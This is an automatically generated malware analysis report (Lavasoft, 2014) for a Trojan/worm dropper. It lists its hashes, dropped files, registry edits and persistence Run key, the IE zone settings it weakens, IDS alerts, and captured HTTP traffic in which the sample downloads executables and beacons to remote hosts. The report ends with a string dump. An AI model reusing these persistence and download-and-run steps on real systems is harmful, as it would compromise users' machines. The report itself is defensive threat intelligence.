Trojan.GenericKD.1874816_257e0dfad8

by malwarelabrobot on December 21st, 2014 in Malware Descriptions.

Trojan.Win32.Agent.aiees (Kaspersky), Trojan.GenericKD.1874816 (AdAware), Worm.Win32.AutoIt.FD, mzpefinder_pcap_file.YR, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm


The description has been automatically generated by the Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 257e0dfad8ebd0db9ff57f0a3421ba3a
SHA1: 0642fbaef019f924842a2d9d6dd8c07388f60305
SHA256: a777e768feea137b32f9be1bf7556f7de9d4b816a42e35f600186f19963fb162
SSDeep: 24576:wtb20pkaCqT5TBWgNQ7aGKbfU7Y9cVTg1IytSXheX9TmE2aYDwskuZrSKVps6A:5Vg5tQ7aGG709AyYXhYdwjwskuZE5
Size: 1811968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AppsInstaller
Created at: 2014-10-27 17:49:40
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1600
Setup.exe:1688
doc.exe:640
Index.exe:1204

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (0 bytes)

The process doc.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)

The process Index.exe:1204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (0 bytes)

Registry activity

The process %original file name%.exe:1600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 6A 7B AD 4B 84 F4 D1 8B 51 8D 37 D4 A6 E3 C5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_Games_pl" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"setup.exe" = "InstallScript Setup Launcher Unicode"
"Index.exe" = "Index"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process Setup.exe:1688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 AC 55 F6 F2 8F 8A 66 53 69 1B 85 BB 9B 2E B3"

The process doc.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_GamesID" = "181019"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A6 62 EF CC CA 58 D3 C1 12 CA A5 7B B3 9B FF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Index.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 72 DE AA A7 F2 D6 F1 84 E2 F3 62 5E EC 85 A1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
cc117b3f01592e8160fe02e77f43bd4f c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\doc.exe
7a3e44250c9a3f18feb54c6f5caec419 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\one.exe
6620e41cc69bd82820b2b7ab1924ee9a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Index.exe
26484349338b15066badb0d2f724693e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup.exe
cc117b3f01592e8160fe02e77f43bd4f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe
7a3e44250c9a3f18feb54c6f5caec419 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 570703 570880 4.63051 f437a6545e938612764dbb0a314376fc
.rdata 577536 183362 183808 3.99959 827ffd24759e8e420890ecf164be989e
.data 761856 40276 25088 1.38816 e0a519f8e3a35fae0d9c2cfd5a4bacfc
.rsrc 802816 988172 988672 5.53 187d795f3be92ab1d7790233fa059ce7
.reloc 1794048 42100 42496 3.63585 0bc98f8631ef0bde830a7f83bb06ff08

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://installs.cpa-install.com/ClientFiles/get/5 104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/updater.exe 104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/google.exe 104.28.5.102
hxxp://www1.somdows.com/computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs= 104.28.20.61


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /ClientFiles/get/5 HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:52:46 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 232
Connection: keep-alive
Set-Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366; expires=Sun, 20-Dec-15 06:52:46 GMT; path=/; domain=.cpa-install.com; HttpOnly
X-Powered-By: PHP/5.4.34
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9eb48752206a3-EWR
hXXp://installs.cpa-install.com/update/client_1/updater.exe$one.exe$@A
ppDataDir$\Google\int$HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur
rentVersion\Run$Microsoft.hXXp://installs.cpa-install.com/update/clien
t_1/google.exe$doc.exe
....



GET /update/client_1/updater.exe HTTP/1.1

User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:52:47 GMT
Content-Type: application/x-msdownload
Content-Length: 908800
Connection: keep-alive
Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT
Accept-Ranges: bytes
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9eb4aa56c06a3-EWR

GET /update/client_1/google.exe HTTP/1.1

User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:53:04 GMT
Content-Type: application/x-msdownload
Content-Length: 913920
Connection: keep-alive
Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT
Accept-Ranges: bytes
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9ebb952e806a3-EWR

GET /computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs= HTTP/1.1
User-Agent: AutoIt
Host: www1.somdows.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:53:49 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df6ea2ee355f5e3364ff5eabad83959bb1419058426; expires=Sun, 20-Dec-15 06:53:46 GMT; path=/; domain=.somdows.com; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.34
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9ecbd73fb0773-EWR
173..181019.7$bdMin..


The Trojan connects to the servers at the following location(s):

Setup.exe_1688:

.text
`.rdata
@.data
.rsrc
GetSystemWindowsDirectoryW
RegCreateKeyTransactedW
%d@wd
uRegDeleteKeyTransactedW
setup.exe
.debug
.rdata
setup.cpp
ISSetup.dll
setup.inx
layout.bin
Kernel32.dll
InternetOpenUrlW
InternetCrackUrlW
InternetCreateUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestExW
HttpEndRequestW
InternetCanonicalizeUrlW
FtpFindFirstFileA
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
skin.ini
-x
RegOpenKeyTransactedW
COMCTL32.dll
VERSION.dll
LZ32.dll
msi.dll
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
CreateDialogIndirectParamW
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
RPCRT4.dll
gdiplus.dll
GetCPInfo
ExitWindowsEx
EnumChildWindows
SetViewportExtEx
SetViewportOrgEx
RegOpenKeyW
RegEnumKeyW
.?AVhttp_file@is@@
version="1.0.0.0"
name="InstallShield.Setup"
<description>InstallShield.Setup</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="InstallShield.Setup" type="win32"></assemblyIdentity><description>InstallShield.Setup</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
@File=%s
Folder=%s
explorer.exe
@hXXp://
0xx
123.tmp
KERNEL32.DLL
>%s (%d)
PAPP:%s
PVENDOR:%s
PGUID:%s
ErrorInformation=%s
setup.log
%ld : 0x%x
@.msi
..\..\Shared\Setup\IsPreReqDlg.cpp
Prerequisites need elevation; launching elevated with arguments: %s
MSI or .NET rebooting before prerequsite
StartStopProgress - Fallback - %d of %d
Software\Microsoft\Windows\CurrentVersion
%%IS_PREREQ%%-%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
%s.%s
%s: %s
Default.prq
DownloadFiles: %s
XXXXXXXXXXXXXXXX
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
hXXps://
installfromweb:
show_eval_msg
show_beta_msg
show_err_msg
show_err_msg_invalid_identity
ShowPasswordDialog
CompanyURL
hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s
ErrorReportURL
cmdline
Supported
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
data1.hdr
APTF://
data1.cab
MPR.DLL
This setup was created with a BETA VERSION of %s
This setup was created with a EVALUATION VERSION of %s
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please rebuild the setup to run it again. The setup will now exit.
EXE=%s
setup.ini
<Support>
<Support>\Engine\Log
SUPPORTDIR
SHOW_PASSWORD_DIALOG
HeaderPathFile=%s
User=%s
Password=%s
ProxyUser=%s
ProxyPassword=%s
Result=%s
-sel_langx
Software\Microsoft\Windows\CurrentVersion\Uninstall
setupdir\x
setup.bmp
setup.gif
SourceFile=%s
TargetFile=%s
0xlx.ini
B..\..\Shared\Setup\SetupPrereqMgr.cpp
Running setup prerequisites (%s)...
%%IS_PREREQF%%-%s
Prerequisites returning %d
Checking setup prerequisite '%s'
Prerequisite '%s' scheduled before feature selection
Features do not match for prerequisite '%s'
Features match for prerequisite '%s'
Marking prerequisite '%s' for install during ADMIN install
Skipping prerequisite '%s' because it was installed before the reboot
SOFTWARE\Microsoft\Windows\CurrentVersion
B/passive
..\..\Shared\Setup\SetupPreRequisite.cpp
CSetupPrerequisite::ExecutePrerequisite
Attempting to execute prerequisite: %s
Return Code from EXE: %d
CSetupPreRequisite::ExecuteGenericPrerequisite
Creating new process for prerequisite, launching command line %s [%s] %s
Prerequisite process exited with return code %d
Could not launch prerequisite, last error: %d, ShellExecute: %d
CSetupPreRequisite::ExecuteMsiWithProgress
Launching MSI prerequisite %s, command line %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations
PendingFileRenameOperations
[WindowsFolder]Wininit.ini
Reboot required - %s key added
FileRenameOperations
Wininit.ini rename
%s,%s,%s,%s,%s,%s
operatingsystemcondition
AltPrqURL
cmdlinesilent
[WindowsFolder]
[SETUPEXENAME]
[SETUPEXEDIR]
%ld %s
%s %ld %s
d.d %s%s
ISBEW64.exe
kernel32.dll
%s%s%d.%s
SetupExe: %ls
SetupExeVersion: %ld.%ld.%ld.%ld
Windows 95
Windows 98
Windows Me
Windows NT 4.0
Windows 2000
Windows XP
Windows Server 2003
Windows Vista / Server 2008
Windows 7 / Server 2008 R2
Windows 8 / Server 2012
Windows 8.1 / Server 2012 R2
.Default\Control Panel\desktop\ResourceLocale
.DEFAULT\Control Panel\International
PSTORES.EXE
psapi.dll
Ntdll.dll
Cwininet.dll
RPAWINET.DLL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
AutoConfigURL
Range: bytes=%d-
dest%d
source%d
InstallShieldPendingOperation
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
%hx.rra
uxtheme.dll
%d,%d
%d,%d,%d
Shcore.dll
E.dll
Advapi32.dll
InstallShield.log
%s[%s]: %s -- File: %s, Line: %d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup.exe
@@10554;200
Do you wish to install %s?
This software has not been altered since publication by %s. To install %s, click OK.
Caution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.
The identity of this software publisher was verified by %s.
&Always trust software published by %s.
@@10652;200
You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
Please enter the password
Password:
%sc%1 Setup is preparing the %2, which will guide you through the program setup process. Please wait.!Checking Operating System Version%Checking Windows(R) Installer Version
Configuring Windows Installer
Configuring %s
Setup has completed configuring the Windows Installer on your system. The system needs to be restarted in order to continue with the installation. Please click Restart to reboot the system.
The installer must restart your system to complete configuring the Windows Installer service. Click Yes to restart now or No if you plan to restart later.DThis setup will perform an upgrade of '%s'. Do you want to continue?XA later version of '%s' is already installed on this machine. The setup cannot continue.
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 6 (or later version), before relaunching the installation'Error writing to the temporary location
-Error extracting %s to the temporary location'Error reading setup initialization file
Installer not found in %s
File %s not found#Internal error in Windows Installer
IError populating strings. Verify that all strings in Setup.ini are valid.
RestartQSetup needs %lu KB free disk space in %s. Please free up some space and try again
/V parameters to MsiExec.exejWindows(R) Installer %s found. This is an older version of the Windows(R) Installer. Click OK to continue.
ANSI code page for %s is not installed on the system and therefore setup cannot run in the selected language. Run the setup and select another language.
Setup requires Windows Installer version %s or higher to install the Microsoft .NET Framework version 2.0. Please install the Windows Installer version %s or higher and try again.
xThis setup does not contain the Windows Installer engine (%s) required to run the installation on this operating system.
'Unable to install %s Scripting Runtime.8Unable to create InstallDriver instance, Return code: %d;Please specify a location to save the installation package.
Unable to extract the file %s.
Downloading file %s.LAn error occurred while downloading the file %s. What would you like to do?
/sec&Failed to verify signature of file %s.
Estimated time remaining:  %d %s of %d %s downloaded at d.d %s%s
Unable to save file: %s Failed to complete installation.
/UA<url to InstMsiA.exe>
/UW<url to InstMsiW.exe>
/UM<url to msi package>
/US<url to IsScript.msi>8Setup Initialization Error, failed to clone the process.:The file %s already exists. Would you like to replace it?
_Could not verify signature. You need Internet Explorer 3.02 or later with Authenticode update.hSetup requires a newer version of WinInet.dll. You may need to install Internet Explorer 3.02 or later.}You do not have sufficient privileges to complete this installation. Log on as administrator and then retry this installation=Error installing Microsoft(R) .NET Framework, Return Code: %dZ%s optionally uses the Microsoft (R) .NET %s Framework. Would you like to install it now?
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 3 (or later version), before relaunching the installation\%s optionally uses the Visual J# Redistributable Package. Would you like to install it now? - (This will also install the .NET Framework.)
